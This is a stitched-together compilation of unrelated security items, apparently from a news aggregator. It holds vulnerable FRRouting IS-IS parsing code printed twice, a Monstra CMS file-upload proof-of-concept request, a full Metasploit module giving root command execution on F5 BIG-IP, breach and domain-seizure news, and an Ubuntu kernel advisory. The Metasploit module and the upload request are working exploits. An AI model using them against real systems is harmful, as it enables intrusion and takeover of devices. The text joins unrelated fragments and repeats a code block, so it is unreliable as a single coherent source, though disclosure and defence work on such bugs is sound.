Buffer overflow vulnerabilities exist in FRRouting through 8.1.0 due to wrong checks on the input packet length in isisd/isis_tlvs.c.

subtlv\_len = tlv\_len - ISIS\_ROUTER\_CAP\_SIZE;

while (subtlv\_len > 2) {

uint8\_t msd\_type;

type = stream\_getc(s);

length = stream\_getc(s);

switch (type) {

case ISIS\_SUBTLV\_SID\_LABEL\_RANGE:

/\* Check that SRGB is correctly formated \*/

if (length < SUBTLV\_RANGE\_LABEL\_SIZE

|| length > SUBTLV\_RANGE\_INDEX\_SIZE) {

stream\_forward\_getp(s, length);

continue;

}

/\* Only one SRGB is supported. Skip subsequent one \*/

if (rcap->srgb.range\_size != 0) {

stream\_forward\_getp(s, length);

continue;

}

rcap->srgb.flags = stream\_getc(s);

rcap->srgb.range\_size = stream\_get3(s);

/\* Skip Type and get Length of SID Label \*/

stream\_getc(s);

size = stream\_getc(s);

if (size == ISIS\_SUBTLV\_SID\_LABEL\_SIZE)

rcap->srgb.lower\_bound = stream\_get3(s);

else

rcap->srgb.lower\_bound = stream\_getl(s);

/\* SRGB sanity checks. \*/

if (rcap->srgb.range\_size == 0

|| (rcap->srgb.lower\_bound <= MPLS\_LABEL\_RESERVED\_MAX)

|| ((rcap->srgb.lower\_bound + rcap->srgb.range\_size - 1)

\> MPLS\_LABEL\_UNRESERVED\_MAX)) {

sbuf\_push(log, indent, "Invalid label range. Reset SRGB\\n");

rcap->srgb.lower\_bound = 0;

rcap->srgb.range\_size = 0;

}

/\* Only one range is supported. Skip subsequent one \*/

size = length - (size + SUBTLV\_SR\_BLOCK\_SIZE);

if (size > 0)

stream\_forward\_getp(s, length);

break;

case ISIS\_SUBTLV\_ALGORITHM:

/\* Only 2 algorithms are supported: SPF & Strict SPF \*/

stream\_get(&rcap->algo, s,

length > SR\_ALGORITHM\_COUNT

? SR\_ALGORITHM\_COUNT

: length);

if (length > SR\_ALGORITHM\_COUNT)

stream\_forward\_getp(

s, length - SR\_ALGORITHM\_COUNT);

break;

case ISIS\_SUBTLV\_SRLB:

/\* Check that SRLB is correctly formated \*/

if (length < SUBTLV\_RANGE\_LABEL\_SIZE

|| length > SUBTLV\_RANGE\_INDEX\_SIZE) {

stream\_forward\_getp(s, length);

continue;

}

/\* RFC 8667 section #3.3: Only one SRLB is authorized \*/

if (rcap->srlb.range\_size != 0) {

stream\_forward\_getp(s, length);

continue;

}

/\* Ignore Flags which are not defined \*/

stream\_getc(s);

rcap->srlb.range\_size = stream\_get3(s);

/\* Skip Type and get Length of SID Label \*/

stream\_getc(s);

size = stream\_getc(s);

if (size == ISIS\_SUBTLV\_SID\_LABEL\_SIZE)

rcap->srlb.lower\_bound = stream\_get3(s);

else

rcap->srlb.lower\_bound = stream\_getl(s);

/\* SRLB sanity checks. \*/

if (rcap->srlb.range\_size == 0

|| (rcap->srlb.lower\_bound <= MPLS\_LABEL\_RESERVED\_MAX)

|| ((rcap->srlb.lower\_bound + rcap->srlb.range\_size - 1)

\> MPLS\_LABEL\_UNRESERVED\_MAX)) {

sbuf\_push(log, indent, "Invalid label range. Reset SRLB\\n");

rcap->srlb.lower\_bound = 0;

rcap->srlb.range\_size = 0;

}

/\* Only one range is supported. Skip subsequent one \*/

size = length - (size + SUBTLV\_SR\_BLOCK\_SIZE);

if (size > 0)

stream\_forward\_getp(s, length);

break;

case ISIS\_SUBTLV\_NODE\_MSD:

/\* Check that MSD is correctly formated \*/

if (length < MSD\_TLV\_SIZE) {

stream\_forward\_getp(s, length);

continue;

}

msd\_type = stream\_getc(s);

rcap->msd = stream\_getc(s);

/\* Only BMI-MSD type has been defined in RFC 8491 \*/

if (msd\_type != MSD\_TYPE\_BASE\_MPLS\_IMPOSITION)

rcap->msd = 0;

/\* Only one MSD is standardized. Skip others \*/

if (length > MSD\_TLV\_SIZE)

stream\_forward\_getp(s, length - MSD\_TLV\_SIZE);

break;

default:

stream\_forward\_getp(s, length);

break;

}

subtlv\_len = subtlv\_len - length - 2;

}

CVE-2022-26125: isisd: overflow bugs in unpack_tlv_router_cap · Issue #10507 · FRRouting/frr

Monstra 3.0.4 does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Brief of this vulnerability**

The Monstra 3.0.4 source code does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Test Environment**

    Apache/2.4.41 (Ubuntu20.04)
    PHP 7.4.3
    

**Affect version****POC**

    POST /monstra/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1
    Host: localhost:80
    Content-Length: 442
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost:65003
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD6KF8q8SlXAspgP7
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:65003/monstra/admin/index.php?id=filesmanager&path=uploads/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=nlofifites91aq2tsi1s520298
    Connection: close
    
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="csrf"
    
    8ff9a93b1f09f4dfa18e06c201b7355e602ea9ce
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="file"; filename="shell.Php"
    Content-Type: text/plain
    
    <?php echo "This is a test";?>
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="upload_file"
    
    上传
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7--
    

  
Execute successfully  

**Reason of This Vulnerability**

$_FILES['file']['name'] in the Upload file module does not check whether the file extension is case,Vulnerability file：/plugins/box/filesmanager/filesmanager.admin.php

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }
    

**Repair suggestions**

Add case verification at $\_FILES\['file'\]\['name'\], as follows:

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
    					$_FILES['file']['name']=strtolower($_FILES['file']['name']);  //Change uppercase to lowercase
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }

CVE-2021-40940: Monstra 3.0.4 case without filtering leads to unrestricted file upload vulnerability · Issue #471 · monstra-cms/monstra

This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',        'Description' => %q{          This module exploits a newline injection into an RPM .rpmspec file          that permits authenticated users to remotely execute commands.          Successful exploitation results in remote code execution          as the root user.        },        'Author' => [          'Ron Bowes' # Discovery, PoC, and module        ],        'References' => [          ['CVE', '2022-41800'],          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],          ['URL', 'https://support.f5.com/csp/article/K13325942'],        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-11-16', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => true,        'Targets' => [          [ 'Default', {} ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION], # One at a time          'SideEffects' => [            IOC_IN_LOGS,            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),        OptString.new('HttpPassword', [true, 'iControl password', ''])      ]    )  end  def exploit    # The RPM name is based on these, so we need these to delete the RPM file after    name = rand_text_alphanumeric(5..10)    version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"    release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"    vprint_status('Creating an .rpmspec file on the target...')    result = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'data' => {        'specFileData' => {          'name' => name,          'srcBasePath' => '/tmp',          'version' => version,          'release' => release,          # This is the injection - add newlines then a '%check' section          'description' => "\n\n%check\n#{payload.encoded}\n",          'summary' => rand_text_alphanumeric(5..10)        }      }.to_json    })    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200    json = result&.get_json_document    fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json    file_path = json['specFilePath']    fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path    vprint_status("Created spec file: #{file_path}")    register_file_for_cleanup(file_path)    # We can also use `exit 1` in the %check function to prevent this file    # from being created, rather than cleaning it up.. but that seems noisier?    # Neither option gets logged so /shrug    register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")    vprint_status('Building the RPM to trigger the payload...')    result = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'data' => {        'state' => {},        'appName' => rand_text_alphanumeric(5..10),        'packageDirectory' => '/tmp',        'specFilePath' => file_path      }.to_json    })    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299  endend

F5 BIG-IP iControl Remote Command Execution

subtlv\_len \= tlv\_len \- ISIS\_ROUTER\_CAP\_SIZE;

while (subtlv\_len \> 2) {

uint8\_t msd\_type;

type \= stream\_getc(s);

length \= stream\_getc(s);

switch (type) {

case ISIS\_SUBTLV\_SID\_LABEL\_RANGE:

/\* Check that SRGB is correctly formated \*/

if (length < SUBTLV\_RANGE\_LABEL\_SIZE

|| length \> SUBTLV\_RANGE\_INDEX\_SIZE) {

stream\_forward\_getp(s, length);

continue;

}

/\* Only one SRGB is supported. Skip subsequent one \*/

if (rcap\->srgb.range\_size != 0) {

stream\_forward\_getp(s, length);

continue;

}

rcap\->srgb.flags \= stream\_getc(s);

rcap\->srgb.range\_size \= stream\_get3(s);

/\* Skip Type and get Length of SID Label \*/

stream\_getc(s);

size \= stream\_getc(s);

if (size \== ISIS\_SUBTLV\_SID\_LABEL\_SIZE)

rcap\->srgb.lower\_bound \= stream\_get3(s);

else

rcap\->srgb.lower\_bound \= stream\_getl(s);

/\* SRGB sanity checks. \*/

if (rcap\->srgb.range\_size \== 0

|| (rcap\->srgb.lower\_bound <= MPLS\_LABEL\_RESERVED\_MAX)

|| ((rcap\->srgb.lower\_bound + rcap\->srgb.range\_size \- 1)

\> MPLS\_LABEL\_UNRESERVED\_MAX)) {

sbuf\_push(log, indent, "Invalid label range. Reset SRGB\\n");

rcap\->srgb.lower\_bound \= 0;

rcap\->srgb.range\_size \= 0;

}

/\* Only one range is supported. Skip subsequent one \*/

size \= length \- (size + SUBTLV\_SR\_BLOCK\_SIZE);

if (size \> 0)

stream\_forward\_getp(s, length);

break;

case ISIS\_SUBTLV\_ALGORITHM:

/\* Only 2 algorithms are supported: SPF & Strict SPF \*/

stream\_get(&rcap\->algo, s,

length \> SR\_ALGORITHM\_COUNT

? SR\_ALGORITHM\_COUNT

: length);

if (length \> SR\_ALGORITHM\_COUNT)

stream\_forward\_getp(

s, length \- SR\_ALGORITHM\_COUNT);

break;

case ISIS\_SUBTLV\_SRLB:

/\* Check that SRLB is correctly formated \*/

if (length < SUBTLV\_RANGE\_LABEL\_SIZE

|| length \> SUBTLV\_RANGE\_INDEX\_SIZE) {

stream\_forward\_getp(s, length);

continue;

}

/\* RFC 8667 section #3.3: Only one SRLB is authorized \*/

if (rcap\->srlb.range\_size != 0) {

stream\_forward\_getp(s, length);

continue;

}

/\* Ignore Flags which are not defined \*/

stream\_getc(s);

rcap\->srlb.range\_size \= stream\_get3(s);

/\* Skip Type and get Length of SID Label \*/

stream\_getc(s);

size \= stream\_getc(s);

if (size \== ISIS\_SUBTLV\_SID\_LABEL\_SIZE)

rcap\->srlb.lower\_bound \= stream\_get3(s);

else

rcap\->srlb.lower\_bound \= stream\_getl(s);

/\* SRLB sanity checks. \*/

if (rcap\->srlb.range\_size \== 0

|| (rcap\->srlb.lower\_bound <= MPLS\_LABEL\_RESERVED\_MAX)

|| ((rcap\->srlb.lower\_bound + rcap\->srlb.range\_size \- 1)

\> MPLS\_LABEL\_UNRESERVED\_MAX)) {

sbuf\_push(log, indent, "Invalid label range. Reset SRLB\\n");

rcap\->srlb.lower\_bound \= 0;

rcap\->srlb.range\_size \= 0;

}

/\* Only one range is supported. Skip subsequent one \*/

size \= length \- (size + SUBTLV\_SR\_BLOCK\_SIZE);

if (size \> 0)

stream\_forward\_getp(s, length);

break;

case ISIS\_SUBTLV\_NODE\_MSD:

/\* Check that MSD is correctly formated \*/

if (length < MSD\_TLV\_SIZE) {

stream\_forward\_getp(s, length);

continue;

}

msd\_type \= stream\_getc(s);

rcap\->msd \= stream\_getc(s);

/\* Only BMI-MSD type has been defined in RFC 8491 \*/

if (msd\_type != MSD\_TYPE\_BASE\_MPLS\_IMPOSITION)

rcap\->msd \= 0;

/\* Only one MSD is standardized. Skip others \*/

if (length \> MSD\_TLV\_SIZE)

stream\_forward\_getp(s, length \- MSD\_TLV\_SIZE);

break;

default:

stream\_forward\_getp(s, length);

break;

}

subtlv\_len \= subtlv\_len \- length \- 2;

}

Fidelity National Financial has suffered a ransomware attack and resulting data breach which involved 1.3 million of its customers' data.

In November 2023, real estate services company Fidelity National Financial (FNF) got its systems knocked offline for a week after a cyberincident.

As is often the case these days, it turns out that the cyberincident was very likely a ransomware attack that included a data breach. Ransomware operators typically steal data from the compromised systems to use as extra leverage against the victim.

The attack on FNF was claimed by ransomware group ALPHV/BlackCat on its leak site. ALPHV is typically in the top five most active ransomware gangs in our monthly ransomware reviews and is one of the most dangerous ransomware groups in the world.

The listing on ALPHV’s leak site has since been removed which might indicate that the ransom was paid. But it could also be another reason: In December 2023, the gang’s infrastructure was taken down by law enforcement. Unfortunately the gang did re-appear soon after.

In a form 8-K, FNF said it had notified applicable state attorneys general and regulators, and approximately 1.3 million potentially impacted consumers. Form 8-K is known as a “current report” and it is the report that companies must file with the SEC to announce major events that shareholders should know about.

The company has not so far specified the type of data that may have been stolen. FNF is providing credit monitoring and identity theft services to affected customers.

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Fidelity National Financial acknowledges data breach affecting 1.3 million customers 

DoJ and Microsoft seized over 100 sites used by Russian hackers for phishing campaigns targeting the U.S. The…

DoJ and Microsoft seized over 100 sites used by Russian hackers for phishing campaigns targeting the U.S. The coordinated effort aims to disrupt state-backed cyber attacks and protect sensitive American data.

The U.S. Department of Justice (DoJ) has revealed that it successfully took down 41 malicious websites allegedly operated by Russian intelligence agents and their collaborators. The seized domains were reportedly being used to conduct malicious cyber activities, including targeting American institutions, in what authorities have called a “sophisticated and ongoing” campaign to exploit sensitive data.

According to the DoJ, the seized domains were being used by a group known as the “**Callisto Group**,” an operational unit within the Russian Federal Security Service (FSB). The group is accused of orchestrating spear-phishing campaigns—targeted email attacks designed to deceive recipients into revealing login credentials. The aim was to gain unauthorized access to confidential information from government entities and other high-value targets.

This action is part of a bigger effort to fight cybercrime in the U.S. and lines up with Microsoft’s latest **announcement** about taking control of 66 similar domains managed by the same group.

Deputy Attorney General Lisa Monaco highlighted the importance of the collaborative effort, **saying**, “Today’s seizure of 41 internet domains reflects the Justice Department’s cyber strategy in action—using every tool at our disposal to disrupt and deter state-sponsored cyber actors.”

She emphasised and claimed that the Russian government used these domains to impersonate legitimate entities and lure victims into a trap. With the help of private partners like Microsoft, Monaco stated that the Department of Justice is committed to exposing such actors and stripping them of their illicit capabilities.

****Microsoft’s Role in the Joint Effort****

Microsoft played a key role in this operation, filing a civil suit to seize 66 domains also linked to the Callisto Group, which Microsoft internally refers to as “Star Blizzard.” The company’s Threat Intelligence unit reported that, between January 2023 and August 2024, Star Blizzard was involved in targeting over 30 civil society organizations, including journalists, think tanks, and NGOs, in an attempt to exfiltrate sensitive information.

> _“Together, we have seized more than 100 websites. Rebuilding infrastructure takes time, absorbs resources, and costs money. By collaborating with the DOJ, we have been able to expand the scope of disruption and seize more infrastructure, enabling us to deliver greater impact against Star Blizzard “While we expect Star Blizzard to always be establishing new infrastructure, today’s action impacts their operations at a critical point in time when foreign interference in U.S. democratic processes is of utmost concern.”_
> 
> Microsoft

The **affidavit** (PDF) supporting the domain seizures reveals a sophisticated operation targeting numerous individuals and organizations, ranging from former U.S. government employees to defence contractors and Department of Energy staff. These actions, authorities say, were part of an effort to infiltrate key sectors and gather valuable intelligence.

****Callisto Group****

The Callisto Group, tracked by Microsoft under the alias “Star Blizzard” (previously known as SEABORGIUM or COLDRIVER), has become notorious for its consistent use of **spear-phishing tactics**.

These attacks often disguise themselves as legitimate communications, tricking victims into providing login information. The group reportedly targeted individuals linked to the U.S. Intelligence Community, as well as contractors working with sensitive U.S. agencies.

Back in December 2023, two individuals associated with the Callisto Group were **charged** by the DoJ: Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, both linked to FSB Center 18. The indictment accused them of participating in a coordinated hacking campaign against U.S., U.K., NATO member nations, and Ukrainian entities, on behalf of the Russian government.

A phishing email from Callisto Group (Via Microsoft)

It is also worth mentioning that in August last year, INTERPOL dismantled the infamous ’**16shop**’ which served as a Phishing-as-a-Service (PaaS) platform. This was followed by the seizure of another Phishing-as-a-Service platform **BulletProftLink** in November 2023.

Commenting on this, **Casey Ellis**, Founder and Chief Strategy Officer at Bugcrowd, a San Francisco, Calif.-based leader in crowdsourced cybersecurity said, _“_The takedown serves a few purposes: Disrupting existing operations, their infrastructure, and their operatives. It puts ColdRiver, and others, “on notice” that their activities are being detected and that they aren’t operating with impunity, which has the benefit of sowing internal doubt and confusion within the operation, which will chill their activities for a while._“_

_“_Importantly, the announcement and the amount of signalling the USG is doing around this takedown is intended to send a message, both to foreign adversaries as well as those being protected here – Russia is a real adversary, with real cyber-operations underway_,”_ Casey warned.

This latest seizure goes on to show how authorities are not only responding to cyberattacks but also proactively dismantling the infrastructure behind these attacks. Additionally, the ongoing collaboration between the Justice Department, FBI, Microsoft, and other agencies also shows how the government and private sector together can curb cybercrime faster.

1.  **Finnish Dark Web Marketplace PIILOPUOTI Seized**
2.  **Ragnar Locker Ransomware Dismantled, Key Suspect Arrested**
3.  **Indian call center seized over Amazon scam against US citizens**
4.  **Ukrainian Hackers Breach Email of APT28 Leader, Wanted by FBI**
5.  **SSNDOB Cybercrime Market Seized in Intl. Coordinated Operation**

DoJ, Microsoft Seize 100 Russian Phishing Sites Targeting US

Ubuntu Security Notice 6609-1 - Lin Ma discovered that the netfilter subsystem in the Linux kernel did not properly validate network family support while creating a new netfilter table. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the CIFS network file system implementation in the Linux kernel did not properly validate the server frame size in certain situation, leading to an out-of-bounds read vulnerability. An attacker could use this to construct a malicious CIFS image that, when operated on, could cause a denial of service or possibly expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-6609-1January 26, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gke,linux-gkeop, linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-kvm, linux-lowlatency-hwe-5.15, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:Lin Ma discovered that the netfilter subsystem in the Linux kernel did notproperly validate network family support while creating a new netfiltertable. A local attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6040)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate the server frame size in certainsituation, leading to an out-of-bounds read vulnerability. An attackercould use this to construct a malicious CIFS image that, when operated on,could cause a denial of service (system crash) or possibly expose sensitiveinformation. (CVE-2023-6606)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle inactive elements in its PIPAPO data structure, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-6817)Budimir Markovic, Lucas De Marchi, and Pengfei Xu discovered that the perfsubsystem in the Linux kernel did not properly validate all event sizeswhen attaching new events, leading to an out-of-bounds write vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6931)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Kevin Rich discovered that the netfilter subsystem in the Linux kernel didnot properly check deactivated elements in certain situations, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-0193)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1035-gkeop   5.15.0-1035.41   linux-image-5.15.0-1045-ibm     5.15.0-1045.48   linux-image-5.15.0-1045-raspi   5.15.0-1045.48   linux-image-5.15.0-1049-gcp     5.15.0-1049.57   linux-image-5.15.0-1049-gke     5.15.0-1049.54   linux-image-5.15.0-1049-kvm     5.15.0-1049.54   linux-image-5.15.0-1052-aws     5.15.0-1052.57   linux-image-5.15.0-92-generic   5.15.0-92.102   linux-image-5.15.0-92-generic-64k  5.15.0-92.102   linux-image-5.15.0-92-generic-lpae  5.15.0-92.102   linux-image-aws-lts-22.04       5.15.0.1052.51   linux-image-gcp-lts-22.04       5.15.0.1049.45   linux-image-generic             5.15.0.92.89   linux-image-generic-64k         5.15.0.92.89   linux-image-generic-lpae        5.15.0.92.89   linux-image-gke                 5.15.0.1049.48   linux-image-gke-5.15            5.15.0.1049.48   linux-image-gkeop               5.15.0.1035.34   linux-image-gkeop-5.15          5.15.0.1035.34   linux-image-ibm                 5.15.0.1045.41   linux-image-kvm                 5.15.0.1049.45   linux-image-raspi               5.15.0.1045.43   linux-image-raspi-nolpae        5.15.0.1045.43   linux-image-virtual             5.15.0.92.89Ubuntu 20.04 LTS:   linux-image-5.15.0-1035-gkeop   5.15.0-1035.41~20.04.1   linux-image-5.15.0-1045-ibm     5.15.0-1045.48~20.04.1   linux-image-5.15.0-1049-gcp     5.15.0-1049.57~20.04.1   linux-image-5.15.0-1052-aws     5.15.0-1052.57~20.04.1   linux-image-5.15.0-92-generic   5.15.0-92.102~20.04.1   linux-image-5.15.0-92-generic-64k  5.15.0-92.102~20.04.1   linux-image-5.15.0-92-generic-lpae  5.15.0-92.102~20.04.1   linux-image-5.15.0-92-lowlatency  5.15.0-92.102~20.04.1   linux-image-5.15.0-92-lowlatency-64k  5.15.0-92.102~20.04.1   linux-image-aws                 5.15.0.1052.57~20.04.40   linux-image-gcp                 5.15.0.1049.57~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.92.102~20.04.49   linux-image-generic-hwe-20.04   5.15.0.92.102~20.04.49   linux-image-generic-lpae-hwe-20.04  5.15.0.92.102~20.04.49   linux-image-gkeop-5.15          5.15.0.1035.41~20.04.31   linux-image-ibm                 5.15.0.1045.48~20.04.17   linux-image-lowlatency-64k-hwe-20.04  5.15.0.92.102~20.04.46   linux-image-lowlatency-hwe-20.04  5.15.0.92.102~20.04.46   linux-image-oem-20.04           5.15.0.92.102~20.04.49   linux-image-oem-20.04b          5.15.0.92.102~20.04.49   linux-image-oem-20.04c          5.15.0.92.102~20.04.49   linux-image-oem-20.04d          5.15.0.92.102~20.04.49   linux-image-virtual-hwe-20.04   5.15.0.92.102~20.04.49After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6609-1   CVE-2023-6040, CVE-2023-6606, CVE-2023-6817, CVE-2023-6931,   CVE-2023-6932, CVE-2024-0193Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-92.102   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1052.57   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1049.57   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1049.54   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1035.41   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1045.48   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1049.54   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1045.48   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1052.57~20.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1049.57~20.04.1   